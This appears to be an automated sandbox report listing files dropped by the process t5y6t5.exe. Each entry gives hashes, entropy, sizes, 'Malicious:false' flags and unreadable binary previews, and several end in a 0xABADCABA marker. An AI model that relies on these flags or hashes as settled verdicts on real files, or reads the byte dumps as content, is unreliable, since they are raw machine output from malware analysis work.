                                                                                            Preview:~G..g.Y....5.../.3...H......l......),O,e#-l.D...V.K..)c.-....J.........Cc.H]}........4.D.z5$.d.{<,O......d.`.I.H.mo..... .PgV=d.F.\..~..5.v....+......:O.ya...+.........G...JT....`=. ...&.'.3.h.@H.i..l(...H..%X5S...b3R...F....F.'.....]X(.C..[ ..U.76..p...#...5.U.-.[...F.h$.....q....]6..R.7...L....v...'...R^...o....pJ@...%..Rs_Lrr."/.j.P.....\.X.....y...ph."K.....-.........9.Kv.kX.}.;n.X...E.T....`..3X?..!9.~.d.".3Y/+......3i7..c...{b..Xz.;.y..[+YP.sum.>.Z,..6..4.."QF..AX.]....n...{..8.B....~T'..SN;...3.Tt........)..f...u.-...<.8D...:./..U$s..0....I.nI..j5$.......$..^:...^J`{..iuT........Ji+.ws'./WP.......C;.{.;.....I..G_.,q.[.C.qhO. R..|....<*.....}..>......,Hw..J._......:...`.POG..\..$..XoS.m...._H..>A^...1.ci..."..v...+F.3...S......]7<I....{z^.uoL._.@0.Ass...\H....X.E...:.CC....L......IN.2u.........:.JZ..%..h.]..r./....ti.h.9.\...2.....a.^...R.._$-S.gM2.x!".....4+....~}...b.8...g.i... {u/.......Jw".j....c4.......d..7..p. \.F.((.;. .K`F..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):33034
                                                                                            Entropy (8bit):1.6072210219782253
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:v2pTbxznIdPLSp58n3Ku46MxmB15r2eYBmPc5cs1xkeB:OpPxznIBM543Ku46D5/YGPs1T
                                                                                            MD5:DB7756C1CDC99F3667424644619FBE5F
                                                                                            SHA1:1BE17B29161F8CD7C248937C5720DB000F49537F
                                                                                            SHA-256:BDB3AC7509ACD6C1E7C58DF2BA44C89A8C04748E608CC03AF8C40AB24E726261
                                                                                            SHA-512:343BAABABE3437931B52E89BD83E5ED2BC568216A4D3516CFB2B62DD31DCDFE1050CD229CDD30371BCF16505BDB813DEC5D00D8DCF64BC1F9252799F2D521AEA
                                                                                            Malicious:false
                                                                                            Preview:..Z............l.NV.ho..J...H7M..\I;...k.....G...f.F..d.;%.....e..'.).M.B..L.....>.h....w..5.W.*.?WO..vh...V.^..".U9....6...|......$....29.o/.j....I....8.....L.,.....F..R.'.....k.. ..a@Y.Z.i......F..T.....'.q..A'.....=.,Y..Z5%|...9vU...8..1#...&.N.<0.n..s..-......3..E-...v......W..\7.8.._.<'.....d..~.R.m.7.W.%3.9...A....[D.o...f.d...r2...t.>....d..W.!..?.x..)...G...S/M.}..S.~...A..F.....M{}... ..W....{....H....Vu.y*o....._..W....E....:P8........[k...Y....J7.*.....?j...k.u....;!...F\.y...gy.%..A.....s:F.2..B....7LU....K.jk[....-..IU.'D......h.wi6.........r...~;.%.^N.N.g..\..\.9....7..L....$![q..6[..J.qZ..!.\{....uM.A$..;...WXi5.1.8....A3.g....1.:fv..........-u....O`.'j`....J[...2E..>..Al....f....1...@b\.W-...<... &.......&U..P.....<..b2.*.>'.5.... `...O....s....ez:..ls..DnK....JlI..^HYb....O..04.T7.H.y..p..0..J...v......>.P.qfa.7...l=..X..%Mf./!....B..!W(.ol#.J...;.._.g.z.Y....[....I..L..M...S..........d......J.....P....>F..Z..QN.a.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):49418
                                                                                            Entropy (8bit):1.1490689911837875
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:fT9FTy8ag59F/MBog81cVVcn3l93iXFz4YuznRBm8P3m43:fT9Qfg59tMBold8FzenRBHb3
                                                                                            MD5:C2585E2F3D7C69EEBD2CA68D9724DC40
                                                                                            SHA1:9A7B199F50FB2864A8BB63FBE943504145DF4719
                                                                                            SHA-256:AEB20746CF56488877AA0ECE5F280A13978FAB96C15B58F6383F71A93234298B
                                                                                            SHA-512:6AD4274493434BE6D1254D929A6519DBD4698CBB4BCB041C108E6C7606C6FA016302CADA5FC861A8D99A43C2F72FACFEDF14453A8AEC1E6B524D6BEAAEB35326
                                                                                            Malicious:false
                                                                                            Preview:t.Bp...S..\..P33.A5..?....~Htk...#..pNm.<...t.)Q..l..O.oFrb......#.%.*22.z..L.&....1.z.F..s..u.6..j...#........S_..c^...\....D...W.u.......B..IrfF#.o`.Zz..,........\......Q_.?.qw]..?..`SH.8.J>m4L.`q.].bI.|U.X.l-+T.v...ji...T...-.Q.m........RGhb.Fx.>T.[C../]%.y..#.1.~...-.OQ(.1..!..P...QJ$.m .+P&.n...~...2..&..r..Gz.C..#.X{{..{.P..^..S.]z......m..A........3.l..U..~.B.N...Z.Y%..|}.oX-..3.........E}.m;.c.t....t.x^...D....w..H....yQ...$....U.0...lnV...I.'.zTe.B.k..%.]....$|.e.1..{..q.oQi.x.j...l.`..F.ysA.....c...~...^Aw+..E.1..g..?.3.I....?'..I.....'u..q=..J..k!.X..ch.....`.U.w.X....X.|......}...=..9w...._..Z..{H..e...H......`....HhdS. A.3t.Q.K......5.uW......i.(.E.0.V..l..(.1.......c.H.W.0....D)~[n.U.....>m.[....j.1.r.5P..N#8P.....{..b...9_Yf[=.<NH.e..!.y...{..j..u...E#.a.2.K2.....<.......7C....?....c....@#ZeQ.....x.S.....?.eg. G."..C/..(.......3(..fGm;..._{V..^...~..."..{.) .c....C..:...Q.F.A.....Bc-......../.B.M..}e2T..s3..3...+..i<.5X..a=.h
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):33034
                                                                                            Entropy (8bit):1.603976591661092
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:jSt+rhtcxLaTeWriE3jirp2Y4qxFnsBOzX5b4D4qK4nKzMRR5kJ:8+rrMaTbWKAp2tqTsEx8FvKzWkJ
                                                                                            MD5:BE89EDD43FEC4E13E78C94C548798B5B
                                                                                            SHA1:A9D8E263FB536453FBD3E745DBE2E0BD506AD50C
                                                                                            SHA-256:70748A991ADB9435797ACC7A87B1C10BAEF90F565843867F58EADFE06877D7B3
                                                                                            SHA-512:94C54E7C1A87681EC25CCFB9E91EE083FE39EB8A2E4F1B55645A6A91711FAE8719F183CCACE2E248B654CC5D81E4122B9E4F0AFB47B392E008B8BC49E363E330
                                                                                            Malicious:false
                                                                                            Preview:}D.....k....i&.i.J..b%.ha)B^.....:8.......@....1.d.G&W...v]....=..............t.....]`&$.....q.Y.=..#.voH..<-.[.x..$.0N.mZ.G....M..N.}.H}.a.uG... /..:..~[.4..t..:......L~...}.......[.....?j.8.L..6.0.F.Z.hr.)-Qz..c..Uy:uF.<..@9..)RD...;..5....[J.=.Y..d.Q?....2..w.m..b.q#..$.F[z..W.d....J...g+b....^H...&~l.......i.'...(.s......@Ls`3..kc.e. Ct...7s$......i<.....j....y.AX".....m.\.K.= ..r.,:....(T...|..0?;')Z...^..8cGW.+....r..O...Q.+.O...=F9......h...L..TC.TB.k....Z2.(..Em..Z&2..<.$..66...J.7.f.k..xpV.;c.`..T.....g.....b..K..c6.?...V.#.J..6.-!...../.!.HA..l...D....q..77L*....D..\.].UBN.....V.o..q...P.....R..8|tt...y.^.Gv....6 @g...(...0.@..$PeW..7.a./.a3.ubm......3'....H.9a....e...Re...e.m...<.g...=H.~....V*g..R.N....@..]&/1...~C..oo..]V.DT/(._...s...IW...'..........#F....Ql....Uh..\.........3.c.j.....{.V..Ls....F...g{..-...>.i>T...W.L..~I.-..-....d.Ds...:`.......L......,y.k.-.e........0..tX...v...%..h.v..I.]C`!.m.+.$eI..q...f|.G....
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):49418
                                                                                            Entropy (8bit):1.1796589066609278
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:r9f8jx5TAqtgqM9MFAo1yBOXzrPUg7iNxdDc0:8TAqtgqrFAo1yBOHUxxn
                                                                                            MD5:339F72F932EAA3759B8D409C8FABD817
                                                                                            SHA1:9834C79CC88BA5805662D2472A58313FEFFE558C
                                                                                            SHA-256:216AB6A7AE25B858BEEF9F45E5B1C61A9548311E3F656E158BB6554078BCE3DC
                                                                                            SHA-512:2CDEC22373D28644A6AE76F5F2690A5F8C70377B975490BA709DC7DBF109A77422BBD9704B645875733CDD62FF98AE622FCD974A06993ADDA67EE902CA201589
                                                                                            Malicious:false
                                                                                            Preview:....pC.(.Z,.;...^&....1.0F.Upc..^0.Q.N.n.....z....J......p..P......B._.....q.X..3.nd7.nt...../..[.O.7.$o..TT.DM....-...2.....axs..Z...C.;s..w._._4..........f...F...^....)U|..uf9.....Mb.@....;k'GP.j.Z...G;.V...).;'.B0..2.....7tU... .U6A.hE....$.....q8#N8.(..V.U[.^.5.V..._.qh_2>C%...^.D.X.. WU...........h".....?.r#.kN.`..])..2......R7.=.Y.t.g...&P....=L.wq32i.vd.'.l..N.=......d.jC..1k..&.lj.Q..EAfV..T$P....Vh..3.......{.h.Z.....q.R=.6^:...,3.V.\......-W.`..f...Z.@.}.........`#/..F{#}...Au...zcb5.8\..8...)h..O$wu..c.G...(.mH.HVn.j..TX.n..p}S>P...I....b....K.}......8N....-..2.:....ip..".}....f1...9'..x.m...s..w.]#...ft...d.t<.Nb..n.a"..T<l..Y. v.2....`.|..Q9e...........g.l.O.`.\..0. .a. ....);..&.+..j....| ..f...K..F..m.C....l.....m..P..R.8...x..o. ..._.^.(.w~..]...y....T.z._.... l...X*.O...C...n........77.......:..i..*..&\.+..b...1Do.'J.....a.&:.K...=..g....]A\.#.......qX[..4.....qL{.G.;B.DF...87...f.6......~.-C..GM.i..G^....Q.<%......W..n.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):33034
                                                                                            Entropy (8bit):1.6058081964739512
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:JG0Wx2hX2Hb8dFai5HpnrNy/nJaoOFKkpLF+xO3E4cTr+8+JqLArpJ9/sQa:JGR28ov5JnwnU9okpLFE77+1Trl/da
                                                                                            MD5:25DD9FF7567B5EA44D19F7FDF7F08AFB
                                                                                            SHA1:6C57273D9B8D919F68C832C103730AB8FFCA9A38
                                                                                            SHA-256:3A7116719296790D95715810B3A9335BD9BE1B06BC872312B01EB5713B74B74C
                                                                                            SHA-512:BC16F783A8D466B8BC5AD50740FF1F134F57CA56C849712AD9F07FFB39D97E1AE19CF434F971F5C7B2FF2DD758DAA4CDFC4413A24F870F02728C90CAE8C6524B
                                                                                            Malicious:false
                                                                                            Preview:.<..'..X..S.s.y.........l...+.v?..yf.?.3......2.Xj..R..{..].Rh......w...[..D$.H.8I.{..@BprO.g...J9.....N.i...e.Y)P 6.EeZ.Q.f.......eL...Mo..L....3li.D....>/.+.U.......H...._+...4....*[3..n..tbL./.1.DvN......a.;...d.$d...@....R.......CU@...\+4.(|.......<..\o.....(....eH.Xu.7.q!.d..P..6<....R...N1..i..X$..`\bN..^.....mn.....n{p[...-R..h..[...@i.hD.....#.....z.e ?..e.@~.DN.7..N..R..kr.r\."))..8;...]..:..u.C.......A.`k.}.k..<+.Vv.<....c..@.476....+q.Y</......<O++Z...%....r.s.M.Q.....y..kJ{.8.N.&.......,...tx4u.i...n......+'^..}.J,....H.v.i*K.......]Ro.:..M...Z....1.;...d.<....n.....*....o...1.C._..((.ZI3.....=\_.*.O...E...B..5.:...,$.....8........"...j...B.kZWps. lW...#48G..!..eI......F/_b|.t...j....`..6eR....9.o.........Itn...mF. .(..9.,...........+......a..u..4..b.....c.W..?.......9"!Y ..v...T....yc..]......d....-pn.C.[|d..+.;..M...5.d..n..B.......2uM..H..5..#rg.;.....?..<..h....|.Kx.I...AD...~|c.\.d^....?eN.....9.A.....*.>.3.B9.8...{
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):49418
                                                                                            Entropy (8bit):1.1575593552515953
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:P5KcoYmcawNA3w3BAp0rUNoc9R5EgS9AJdn/kI4/Ve0Mca5z1KQw:hW4wcab+wED9AJdnB44R5z0Qw
                                                                                            MD5:9285F455B7E5F20396D99CC4D39143AF
                                                                                            SHA1:215DF2CE5CE857D9E09D05A55EFC9665CDE06205
                                                                                            SHA-256:DEBDBF6F73158D811F620DD1AD2FDBE6FD2E254BB99A6A0E4598CA3AD02AADE8
                                                                                            SHA-512:93B1485B7A0D949763393842E05472211D896EC9C9DC65A6BB3F9F66384850C30F19D9C2DFE67A45452BE5D04243CC43078211ED9E3D7325FD7501D71AD8C85B
                                                                                            Malicious:false
                                                                                            Preview:3."...0..d|9..v..a.ia~..).1....wf.."U.)....e...(.[z.o3b3vL.0J.~.....Z.....i.])x>..,%...N.:4...c.{..(.a;.....v)ZE...q.........G..|})....$w....iL...A..p....y.&.....]....K..R....\+.. .Y..k..y.i...U.aUN4.C...|..LY..F/...y..?.G.....8..5..j..&...q.?}"."...r...Jh..j..x.:T..^5+.m.!z..\.%u.!.Q....).?D*...(c.w.2$.8.}.\d.;..A~...A.8aD...al.=.<......H....p.6.A<..Y..5..}..D..2.0G.7..s....n..A..S>..z.}n.tT.....B....I.}.....p..._.........-8..6.....Q....G..(.c.Gx"!..r.M8.d..=>s8+.}...76.g..O..W-.?hOy.zB.......{R...a..I..Q)M....d.EE.O..j.;...r&2U...q.<.._.'..o*M.....U..1.I."...2.@..S..e..rQ..*=.*..A~H...Z.|.a..........*...^...[6t...[......Z......)....{...........$..[]......K..@.S ..z.!.....6...D..=.=......v.ijW....Ce......oqL,..Ft.....av.-.~[.:.....%..&.@.\.]JX.a.p.,^...6Q...W=...6...|.......Wc.w.x.5.R.....)V.....s...Pj...u..)d9[kD.P.r?.Q...>.F....e..F..[8$.j.q.A....1.A...1..JRVB...........\.Z.@bz...ox.7....AiV.Ro..A$....pt......\......p.oR.e.p.....6W
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):33034
                                                                                            Entropy (8bit):1.6534614961744027
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:VBvOg1ZD4lR/xYZUgrphzCIywYqyHmFPzT1QKUyksYf7n+GWob0cUYg:XZDyZenrph+ImnmFbT1ndkVf/Dg
                                                                                            MD5:39851195DC3634DBCF868B0240AB4001
                                                                                            SHA1:62DA2566B0D395E668230EA1A15F7D77D5E7CE88
                                                                                            SHA-256:6EA668E2728938790EC6C5AC8534EDB28CE1112C4C9F08BA1125A11D9D601486
                                                                                            SHA-512:2217F942883E463184378CF0421392B91AEB5E9B36679E79D6D2FEC62A9E1D021236E0EDBEABF619E8F8E5069AE0F2DC3AFBC6C0F3F9CC1DB2A2B35E64D59397
                                                                                            Malicious:false
                                                                                            Preview:]..u.<4...0PF.....6....6.U.9.M.<O.b.....u....S....A.z.?q.T.M1+p^....o)L..O0.O. .jE.@?{.0...a.k.Y...+.1......{ix.i..Z...O7L.V.\.>...yTI.!N.L.5.X.B.3....F....ij...*.n=f...M....f...q....,...]o...Nmx.M..%X.v^...*->.9....<...m.K#......v.e...e......nQ3-.c...ja.....$.k..~$#..v..........'$.'.+..Z.....*.....Jm..?...Y.....nv8.../..s.....G.uG;....A+..V.z...olD...i.;!~.{^Bn.>.^s.-... ../&.|...m.......4.c..._....!GpUP.../..M+O.N{..&.....j..%..>;.*..u....d.....<.......hw..<..7./%..2....#.....;O.8..........v.2...k...y..{.1+#...-.l..0.o.^iC.BF..I....H\.....^.g.k3*.*....+.....{...L.s.L.|7_.{.e.(."LK...}...V....._yH..g4....:#..q....+F..g2....+.z.9...{.[~>%....=...;.}jzH.n...i.65.A.S...8i..}lh.V.....;3...\..?b.......r..c..J...t'.Y...}f.Y..cF...v..u....1...Q}.....m;f.>g.1.......&.{..R].W.y.`.:[x.a.`...D......A.G.@._X..fX..,.!......}..8I.......d.o".p!..B{...(..R.7.q...#L.......(.:Kb..y.^..g........+-.`.v.&1ppG.{.:..k....r.......l.8..(>.ujx9...R_@n#.n
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):540938
                                                                                            Entropy (8bit):4.18574282768232
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:Xv5ocEznpqziziEwqsX2YkGE/f2RaD09Cw/o7k:Xv+cEyiziEwqsG2HRaD0xgk
                                                                                            MD5:8793E052C1E2E23DA96C24ECA4B9BD44
                                                                                            SHA1:820523F414119B2FD23721B05EE57A2D87874ADF
                                                                                            SHA-256:8068FC72004E84888CF2FA7C148FAAC54C38D4B72904DAF7343DF13F2566BC38
                                                                                            SHA-512:48492CF4E29A6E82AD04FC4DAF66B00202954C494F0819A686C5DFD560D2F8EC9CA7DE3E6BDB467EF472B83FB30DED49BAE22EFFA6CF96E873CE64FD0E09BD11
                                                                                            Malicious:false
                                                                                            Preview:.`..4TH.9...pA...D..Bek...L2..{vI*...O7.XU?....9...q.iV,.D.t.. ...UY....d..w.\z... x...#u....F..F.....}.)Kg.<.FS...x.,Y...iD4NCc...a.....(g..6U..{....#".;Oj....=..0....-.......By,S....knV.-U...&...${....>.O.kx.....P.e.$...>+ZP.c.g.6&...[.....2..{..6Ue..^vn.ln.....L..Ab........'N.>(...+V4.*v.....]Wdq..B...B9..8..8..Jm......E..).i....k<...S=|......gv....g.......W..i.fw..r0M...R...'.z.K..UN..!h%..../.. .Fu.-..J1....Z.'.dZ..B..*^.L:.V....|O...]...J.=...8.v.M%..a..L.5.w.JpV<...9.2.u..........$oA..{..yc.Z.09...r.I|L...=.m;F.x.a\..3......O..>.0..q.^..XwJ..w..a4...xzC.o.Y.?.2....N.C'....HtC.b...}..V..=...4:iq.t.......A......I.p...m.........J~.(.@.S..fpV...Z...e.u....sv...l..m{|......}tZW+M7....M.#cR.P.....yq..].8.c.T..0^.HB.B&....a.`.....P.`.?Gf%.....p..|..c3.{..][J../z.H..I.....[... .{C...H....FM.FK..q .#...i(...#..fGC.n.<.m..=.Ey..n../....=..oaP'.{.k8l.....%.D{..i+..y8h...S..U......h).......Gv4.~.fx.z..?].](J..?.~5y.!zp....l.x..c..:.DY"f.Vr<..-
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):4679
                                                                                            Entropy (8bit):7.933036931021872
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:rtmDJxG5s7wNefgonO3F09rWjtFex/2QNT2RZVDI1WzMcn2q2QgbOm:reoW8UuGEK/2QNTfWtrgbb
                                                                                            MD5:54310A7390D14D2623FC41150137C43B
                                                                                            SHA1:6C516D5B10ED8CCBB465A3966284FA0EC800ABB2
                                                                                            SHA-256:AF277747C9834DAC4D684B608D5F5F5F5191C6484C533C383A3FF271A28953C4
                                                                                            SHA-512:3858A3FC2D2D06A877FECEDD506E9224582FB1C4E16511C0403453B7E3E663F16F1774CBADE60D16123ECEE7063114CD640B2706C586AAA0F81C3B3692CA122E
                                                                                            Malicious:false
                                                                                            Preview:r.kW>.w+O..r.;.V.n...........{..1../HE`5.}. .u\*....c..O.&.^`7k.VT...zpb.@..Gu|.l.8.......+.)..}.v75....?.).?6.?.....>M...f*............|..3..s..8...ue.T.aT.;....."fJv.WF...H`U.J.......,....G]_...g.>[..d.....J.S..QN.,...9...U..P.S.`p..g....?6x`...=...@Y..@.E......6.n.n....j..".....>.6%D...H.,.m..dm..9..g..9..YG.<..?WX....l6y>.u/(..x..4.Z..2.....//......ww..4b.......t9:...G....k..0=..V.?..R{.S.-K.a.o.n...n=../....^.z...M..J.8.FB+.xG9b.6A.o.........T.4.=.......w..d.._..,.?..{.?.Z:Z.N ]$..H}..>...Z......]....&.N<....+..v..cJ.....T(.......rX..B.~...$z...{.b...U<..$..vC@......E..Ik.9}.........9]<.y#..)...^E..V/G.1..=7.t.=.Yo.b....Vs6.8.O.K.......r...G......yZ.b.b.?%..D.^.)........m..EuB,yN-'..aUh.C.mj..S.(W..2.@'.....D.f...%..(f"&k6O...Te...Z...ay1.<m..M[&...N....%..7o;..\...Y.S.....~...%.]@2.=.l..(...K..Vl.!\........N......{.......u*.Z.?.sg/.6.T.6.1..4.h..QK....&...z...E...\8:z*dO...w......X...{....E..kc-.6.GO9.I..F.c.5j.....K.....-....].....T
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):316
                                                                                            Entropy (8bit):7.27578595069255
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:xAlC0NZUOim4iAI6VBACuRM0UW+IzWeES1NpmIQbJ4pdHWHvJxNIY8/61pxdn:GpPNAI+BATK+fES3LQbJkMsR/2pfn
                                                                                            MD5:6DEDBC93C87A663AA27CACC12E1C4A0E
                                                                                            SHA1:B1CAC91EDA7FD2ECFA93FE481AAD1B2488B4E147
                                                                                            SHA-256:01368CF9E68B404ECC3A251EC41818381A75933AA69BACFB65903EC88BA53571
                                                                                            SHA-512:B0FD786F87599241303DABB3547893AFB3841360D2EC09502D399F72478A93AAA0A7B10B9D027EFD0E229797CCC590F8FFCAAD7FB08CBC4B9F8D984A5297A674
                                                                                            Malicious:false
                                                                                            Preview:.503e....*...&.~y....a -..7..4.....6...z{#.<@f6}'.}...8.....%.\K....+.....^xN._+.G..F#p.<.=Hg...U[..P#..:7.....?w..<..sD....hx..`.d.....z...b...!2HR(j.=O~.!..C^U..h.Q..\O.D...p..p.~:......R.9....(......>...9...ko.l........t.O.gS.....R..K...d.......+..n....@..20......|..8....Al..[.HR.v..9...0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):33034
                                                                                            Entropy (8bit):1.606117917085958
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:FocJuLzQXGeuU4Z5XSU7YsNbARJSa49YQIKTFwepd5:FWXuG4QFSU7Px3jxXpwepd5
                                                                                            MD5:424FDC1995E498438A41739393431C2C
                                                                                            SHA1:32710D511319D516EE5862967AE4BCA410AE4750
                                                                                            SHA-256:ECF9FC95493073A1D70A570E1A34807571F97DBB86BE678251D0F18F7869F5B4
                                                                                            SHA-512:EC9158FB0B52A01B6A9BC7BF3FA20F827ACB9E338E6AD1B2858A847BBFA83DA605D7D5C0F1A0B00659994749C8DCC4FA7C53AE002BF9EA95115D1BE2C6EDAAE2
                                                                                            Malicious:false
                                                                                            Preview:...g...~.3j.6.....s..P.....w{M.<.....qwg[!.S=i|#Y7.Y?.X..~H......%..OW.....T?......EH2.........U....6#!.....hp.....w.j.a..2.....}..C.2....-.Z.8...L.R..LB.)Xc.<.'...E..E$aY.....ME~h6E..AZ./...X......;.8.x.i.8......>.N..>.ol./..c8G......s|.9....|3}.ezX...j..@.`.Q....7.mE. d..[.nV.....![.+=...D.....%..K..G..,^\y..f..Z..IV...h.T.{.Z....9..^.x>7J.....x..c.....E.m.{.S...Q..L.E*.. ._Q..D..._..F....t.j...ya.*{.n...y"...%.nja...Q].'..R...J...N.O.Z..ht......=.J..E.inh.^..Y.!.+.&..Yl.....'.]..M....9..pvR.a....u...g..#.9..3....]&.CT#.s&..N...C.......v80IG.S...kg....G.\x..cwl..JP.....0;+.[>5.U...#....'..O......uG.. .qO....._.<...%..P.tg#|:....5.F...7.9..b...i. .t3.aF..=.T....<...}Z9.9....w.". 2%....9......-......)*Ah.x..z)Q..R...m .......6.E.{...A<.>7....u.'.u.......U.q..C..0.K..>..Wp....[og]p.....:..g>K.uO.6..Zf.3..St...W.6..T.2....VQ.`..S....=MM..D..>.......,.K.z.T..K..L.*.....Id......i..zZ.?[..p.o.x2...._H.r.Qp..!..hx.d....6.O-...S2.|V..5;.i'T
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:Java serialization data
                                                                                            Category:dropped
                                                                                            Size (bytes):98570
                                                                                            Entropy (8bit):0.6452078167260621
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:A9sQXllXsIRTIhJFgeKVGrPxSvlRVJa4O3Ke+SV8sn4EbOC7P:APVlpIhLgeKIsvW4Gx3bOC7P
                                                                                            MD5:63EC357B9E07458AC8A3E04FA8A18BC7
                                                                                            SHA1:81CAC9A82269F1209CEE92AC41F0A465FD202682
                                                                                            SHA-256:C9C5423FAAEDB10D284BAE74C6810311E2B5DF064BC72AE998E9162AB70CF076
                                                                                            SHA-512:B7A05FDA8239232DBD2D943405F91961CC0C4EC78592DE16F00B66E55E66E718FBFA1BC9B30DADAA6ED130C611A80B3C9B7E41F8F2B521BEEAA89BB972FDD846
                                                                                            Malicious:false
                                                                                            Preview:..O....S...W....... ..v..).......@..|.iXR.qcd.A....u.+.h.EX...b...[%%_@.l.z#...O....W...UI...p..Zp.9Rv;..).B.+.Xz..a.c1.........r.-...]....._..4G..o..A+.....E.]8...R.....h<\.0d..H .n..&.....c.2.=P...x....9z...i.1%.c*.w..s4:.49@....&5..v..x..ac.gb.'.g...SPk..gq......|X...y$.g..>.0.".8.!.,._Q.l...,(....P.."l..d6...b....xpDY.T..........g.&...........HF..PK.Cn..........!y.s..7..Q...P..#X..A......A....Lu%.C..Xv.........rk..........m.T....:....u..`%?..}....sh.)..N+Y.{%.)..E.....7..).Sp.u..B..k/D].........j.R..9.(.@$qN.0....V.1..q{...c/uS...0..K...<<.1...R...D.9...Z.v......*,........2..k.....".o..2......'w.@.}..l...Q.|>.....t.^R.|y.<....de.k.....ZH..K.eh}...mo....d.p.....E.r;>...m......5.K._-3)..,..M..=.67..E.h..wO...?.HaX.q.x2..4>..U..i.........Z.u{....;.[...UPL....."..E"...+.|.L..fI.......Q....5S.PB.@).o$..%.....u.9c.{q...)...DK[...|.%..M..%Sx`..?M.S.|...........hb....!.....2..f.....F..S.,....ci{.S..u./...r:......c.M/..=<0L.A.*%...>.7.j=
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):341
                                                                                            Entropy (8bit):7.398989796963018
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:TZU8MA1YvSmifkSQXHN3gxT0ffeXiSbwnyy/p7NuhpFSXBWoxkSZbXZlHn:TfMQYKVf7SwxTo+cn7pgzFSXgoycbn
                                                                                            MD5:1170F00A590941B5D345309D1B434530
                                                                                            SHA1:3014575D1A6FE9B6143895CD0ACA43835BA82B84
                                                                                            SHA-256:6A2541C3D9D4C3B8E86E441A92617472412A0C54883F7C68445920C8418460AA
                                                                                            SHA-512:23F56FDD8E699466D3587607A09D13BAEE477B2250AE3FA5CE3D7A4FCA9F4CFDCCA8B15840FA6F4A08C58C3A1CBAD630D1B34B5FA9AF453A3926077BC9D8260D
                                                                                            Malicious:false
                                                                                            Preview:.f,.'J3LE...M..W......Q.......L.t....C..7z..`........{.ci..ocked=1....2.q..9.@...4.AF.)s......1...\.Fnp.%...(.`.tV.....r....!.xN...9.I.>y..C.em....!f.z:v.kF.SM.s......Pn1......yl.p.G.{p...v......:...n..$V.p.....)..l(.$o.......;.637>...M......x....I.#~..85..3........dW;.*...Q.k.)r.9.........d...&.vx....3..?,..j8P`.0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):571
                                                                                            Entropy (8bit):7.626344485647748
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:L4nL37WhnO4MKHrntw6t/0SeqUbfO/EjEnr0cGtKAm1q7nJbnCn:L07qZHzt10SevbInnr0pYAR7JbC
                                                                                            MD5:A8F27DACCF32E7B061E6CD235358B90E
                                                                                            SHA1:FC240E49799E340CC394CB496CD1493723DE3773
                                                                                            SHA-256:C65E37D3554F42C6994BAF19EE219EE4FACF813F76C918F15C0897AB75FA0CBC
                                                                                            SHA-512:1C1AFC5F279E4E8DDA7A8BFFBA8B0273CEEFF65E69C597DAF290EA478B368B9CF5BEC19515291BD55FC7EDE344A8D8FFD7021A279835D98459484B60D7918D29
                                                                                            Malicious:false
                                                                                            Preview:#..t uc..%.m.......N.G.u......w.De..v`.C...Y.m.lV~e;au...6..b[.>^..M..T2)..'.Z...v....7.X1..e.}e.F?.UQ..(..r....II..BAs.ny.p}.e..x[..6ql_...6..d....1j......gG......0Z..*........Y.,.YT...Ga....1.p.(........U.*...r.l9`....h....u_..Yj....K.'....Y.i'Q.._b._P..=j.....*.e5.#....,q...p...1..6E.4a...>{}~..r..lD..i_=.V.....D.iK.1:>S..z....S.s..B....6/.....!..:.3....jR.K....eN...:.......l......j1.h..7...<]Q,...a...U.z..Kb..v.c..k......$......~..|.DdS..f.'....9.;>...k.@.....7FU.F.6.a.S.Y.. 2h...._.^.-.w.6V./a.....-.!\H ...(.-..F-j.'.AE.)...:..0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):377
                                                                                            Entropy (8bit):7.44859489528024
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:Ztz3CXsOI+YjkLLUE58/LGTzvG1QjPLwdWcLl57nSoosgfnd/WuxPJ2K/r7stAhQ:b3hDzgE2C1QzLwMcLTAf97xzrpSn
